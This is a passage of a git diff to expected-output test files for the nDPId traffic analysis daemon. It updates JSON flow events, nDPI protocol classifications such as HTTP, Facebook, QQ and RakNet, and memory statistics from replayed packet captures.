{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":65,"flow_first_seen":1429000052217,"flow_last_seen":1429000153720,"flow_idle_time":7580000,"flow_min_l4_payload_len":20,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":42262,"flow_avg_l4_payload_len":650,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52009,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1429000153937,"flow_last_seen":1429000207676,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5584,"flow_avg_l4_payload_len":698,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52017,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000207973,"flow_last_seen":1429000236577,"flow_idle_time":7580000,"flow_min_l4_payload_len":72,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":4656,"flow_avg_l4_payload_len":665,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52018,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
+00692{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1429000237766,"flow_last_seen":1429000347404,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":18206,"flow_avg_l4_payload_len":728,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52019,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1429000347103,"flow_last_seen":1429000374116,"flow_idle_time":7580000,"flow_min_l4_payload_len":446,"flow_max_l4_payload_len":1192,"flow_tot_l4_payload_len":2530,"flow_avg_l4_payload_len":632,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52021,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1429000375190,"flow_last_seen":1429000385363,"flow_idle_time":7580000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":3892,"flow_avg_l4_payload_len":556,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.35.40","src_port":52022,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} 
-00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} -00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} 
-00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000031698,"flow_last_seen":1429000032158,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52285,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000037314,"flow_last_seen":1429000037771,"flow_idle_time":7580000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":470,"flow_avg_l4_payload_len":235,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"173.252.74.22","src_port":52288,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": 
{"confidence": {"6":"DPI"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1429000110390,"flow_last_seen":1429000110528,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":625,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"203.205.147.215","src_port":35670,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Tencent.QQ","breed":"Fun","category":"Chat"}} 00590{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1429000048159,"flow_last_seen":1429000048795,"flow_idle_time":7580000,"flow_min_l4_payload_len":487,"flow_max_l4_payload_len":1169,"flow_tot_l4_payload_len":2143,"flow_avg_l4_payload_len":714,"midstream":1,"thread_ts_msec":1429000385363,"l3_proto":"ip4","src_ip":"10.54.169.250","dst_ip":"120.28.5.41","src_port":44256,"dst_port":80,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3} -00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":155,"packets-processed":155,"total-skipped-flows":0,"total-l4-payload-len":95867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":121,"global_ts_msec":1429000385363} 
+00566{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":155,"source":"quickplay.pcap","alias":"nDPId-test","packets-captured":155,"packets-processed":155,"total-skipped-flows":0,"total-l4-payload-len":95867,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":120,"global_ts_msec":1429000385363} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 155/155 ~~ skipped flows.............: 0 @@ -127,9 +126,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5900352 bytes -~~ total memory freed........: 5900352 bytes -~~ total allocations/frees...: 118402/118402 +~~ total memory allocated....: 6033986 bytes +~~ total memory freed........: 6033986 bytes +~~ total allocations/frees...: 121164/121164 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 2367 chars diff --git a/test/results/radius_false_positive.pcapng.out b/test/results/radius_false_positive.pcapng.out index b4f6c74be..c937bedec 100644 --- a/test/results/radius_false_positive.pcapng.out +++ b/test/results/radius_false_positive.pcapng.out 
@@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869733 bytes -~~ total memory freed........: 5869733 bytes -~~ total allocations/frees...: 118124/118124 +~~ total memory allocated....: 6003367 bytes +~~ total memory freed........: 6003367 bytes +~~ total allocations/frees...: 120886/120886 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 479 chars ~~ json string max len.......: 2155 chars diff --git a/test/results/raknet.pcap.out b/test/results/raknet.pcap.out index 7df550f8e..4e5f03c9b 100644 --- a/test/results/raknet.pcap.out +++ b/test/results/raknet.pcap.out 
@@ -4,69 +4,69 @@ 02391{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946711624286,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946711624286,"pkt":"eJS0JASgYDjgxTWgCABFAAXUl7RAAD8RIvLAqAJklJkjza3V6n4FwDU+BQD\/\/wD+\/v7+\/f39\/RI0VngGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946711624328,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946711624328,"pkt":"YDjgxTWgeJS0JASgCABFAAA4I79AADcRpIOUmSPNwKgCZOp+rdUAJGm+BgD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgUiIAAF1A=="} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946711624332,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946711624332,"pkt":"eJS0JASgYDjgxTWgCABFAAA+l7ZAAD8RKIbAqAJklJkjza3V6n4AKr6IBwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup+AkAAAAAASQ8CfA=="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711624286,"flow_last_seen":946711624332,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711624332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711624286,"flow_last_seen":946711624332,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711624332,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":16,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946711673443,"flow_last_seen":946711673443,"flow_idle_time":200000,"flow_min_l4_payload_len":1464,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":1464,"midstream":0,"thread_ts_msec":946711673443,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946711673443,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946711673443,"pkt":"eJS0JASgYDjgxTWgCABFAAXUsU1AAD8RCVnAqAJklJkjze0R6nwFwPYDBQD\/\/wD+\/v7+\/f39\/RI0VngGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946711673461,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946711673461,"pkt":"YDjgxTWgeJS0JASgCABFAAA4cDJAADcRWBCUmSPNwKgCZOp87REAJFSIBgD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgUd9gAF1A=="} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946711673464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946711673464,"pkt":"eJS0JASgYDjgxTWgCABFAAA+sU9AAD8RDu3AqAJklJkjze0R6nwAKn9QBwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup8AkAAAAAASQ8CfA=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711673443,"flow_last_seen":946711673464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711673464,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946711673443,"flow_last_seen":946711673464,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946711673464,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00552{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":31,"source":"raknet.pcap","alias":"nDPId-test","packets-captured":31,"packets-processed":30,"total-skipped-flows":0,"total-l4-payload-len":3906,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":2,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":946713048252} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048252,"flow_last_seen":946713048252,"flow_idle_time":200000,"flow_min_l4_payload_len":1464,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1464,"flow_avg_l4_payload_len":1464,"midstream":0,"thread_ts_msec":946713048252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02393{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":946713048252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":946713048252,"pkt":"eJS0JASgYDjgxTWgCABFAAXUUWdAAD8RaT\/AqAJklJkjzYC36nUFwGJlBQD\/\/wD+\/v7+\/f39\/RI0VngGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA